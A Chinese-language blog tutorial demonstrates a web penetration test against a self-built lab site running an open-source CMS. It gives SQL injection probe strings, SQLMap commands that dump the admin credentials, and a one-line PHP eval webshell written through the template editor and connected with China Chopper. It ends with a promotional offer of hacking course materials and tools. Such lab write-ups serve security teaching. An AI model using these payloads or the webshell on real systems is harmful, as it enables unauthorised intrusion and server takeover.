本文基于某个开源的CMS搭建一个靶机,来演示Web渗透整个过程。
1. SQL注入检测
在访问网站时收集资料,了解网站的各项接口、功能,手动测试其每一个参数是否存在注入。其中发现一个带参数ID的页面,如图1所示。
图1 带参数ID的页面
通过手动注入判断该参数是否为注入点,发现当输入id=10’and‘1’=’0时返回错误页面,如图2所示。
图2 返回错误页面
而当参数id=10’and‘1’=’1时仍然显示为正确页面,由此怀疑ID参数后面的and语句内容被当作SQL语句一部分带入执行,此处可能存在SQL注入。
2. SQL注入利用
纯粹的手工注入将花费大量时间和精力,此处利用SQLMap工具对此疑似SQL注入点的参数进行判断。
利用SQLMap语句:
–u “http:/*.*.*.*/yx/index.php?r=default/column/content&col=products&id=10*”
判断该URL是否存在注入,其中,*表示判断该处参数,其结果如图3所示。
图3 判断注入结果
可见参数 id 存在布尔注入、错误回显注入、时间盲注等多种注入隐患。并且 SQLMap直接判断出其后台数据库为MySQL 5.0,服务器为Apache2.4.3,脚本环境为PHP5.6.25。
利用SQLMap继续查看数据库内容,其中利用–dbs参数查看所有数据库发现共有5个库,如图4所示。
图4 查看数据库
猜测yx_test为该CMS的数据库,继续深入查看其内容。利用–D 库名–tables可查看指定库的表名,如图5所示。
图5 查看指定库的表名
共有20张表,需要得到管理员账号密码,因此,利用–T参数指定表dump其内容。
于是得到了该表的结构以及其中数据,并反解MD5,可以获得一个登录名为admin的账号和密码654321。
3. 后台登录getshell
进入后台,如图6所示。
图6 进入后台
继续在后台管理平台上寻找可上传Webshell的方法,以取得服务器Shell权限。
在进入到全局设置下前台模板的管理模板文件功能后,发现有许多PHP文件,其中利用添加模板的功能可以直接在网页上编写PHP文件,并保存到服务器,如图7所示。
图7 编写PHP文件
利用网页编辑,写入一个一句话木马,其内容为<?php eval($\_POST\['test'\]);?>,写入到一个名为muma.php的文件,如图8所示。
图8 写入木马
木马写入成功,只需知道网页地址即可访问链接。
最后利用中国菜刀工具连接该木马,如图9所示。
图9 连接木马
成功连接站点,可以远程下载、上传任意文件,也可运行Shell执行代码。
黑客&网络安全如何学习
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
1.学习路线图
攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。
2.视频教程
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。
(都打包成一块的了,不能一一展开,总共300多集)
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
3.技术文档和电子书
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。
还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。
这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。
参考解析:深信服官网、奇安信官网、Freebuf、csdn等
内容特点:条理清晰,含图像化表示更加易懂。
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取